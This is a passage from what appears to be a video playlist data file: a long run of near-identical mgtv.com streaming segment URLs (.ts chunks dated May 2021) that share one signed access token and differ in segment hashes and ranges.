rotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEa
zWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/EA1EC0881634FB754217EF0044C3ACD2_370080_380080_1053_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/E7A2298D167DEFC0756544B2CE049449_380080_390080_1402_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41
e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/4AE3988A48F84870551B7E9E0B972D0C_390080_400080_1203_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/86030710F253729A64ED1BE37E460F49_400080_410080_1172_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/15795D700CC6D545EC45BD538A0E4B3B_410080_420080_701_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jt
Nbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/40DC106AE04E6A38CA00B3CF50D858B2_420080_430080_639_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/0C069030A9A6E356C595A8AF7503F86B_430080_440080_943_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ru
id=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/C17912079CB02C659945AFD0BCA18E39_440080_450080_1087_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/18BD7516B401D7CC9FF6BB80E8077156_450080_460080_1312_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/7B7F1B6A5B2AE6878BF101936B266E41_460080_470080_1257_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhr
BBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/E64B34D59269D35A38507BB07D75F047_470080_480080_843_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/C5247FFB852A0F4711120B4CB5959A56_480080_490080_637_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vc
dn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/864FFD0BEF914E7293AE63BB89F26362_490080_500080_846_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/6603DA575FD73F93D0BAFF18F818A4AA_500080_510080_655_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/5E30A3C9B0201D4EECFC78326196886A_510080_520080_685_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6C
E0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/D80B2FF9A0B25373B8D41AFFC795C3F6_520080_530080_1313_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/B3CC7BB962D247DBAD6391CDF9034B12_530080_540080_778_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCew
GykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/0EB2957DC3D1F071228DE95A48A07DD1_540080_550080_506_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/43B3714678E1359283BFF2AFDFC72194_550080_560080_700_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/41FE00BEADCA34C3245FFE668303C9C4_560080_570080_818_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUsl
SHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/2F09FBD2A988096852FFDE097120F471_570080_580080_1294_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eO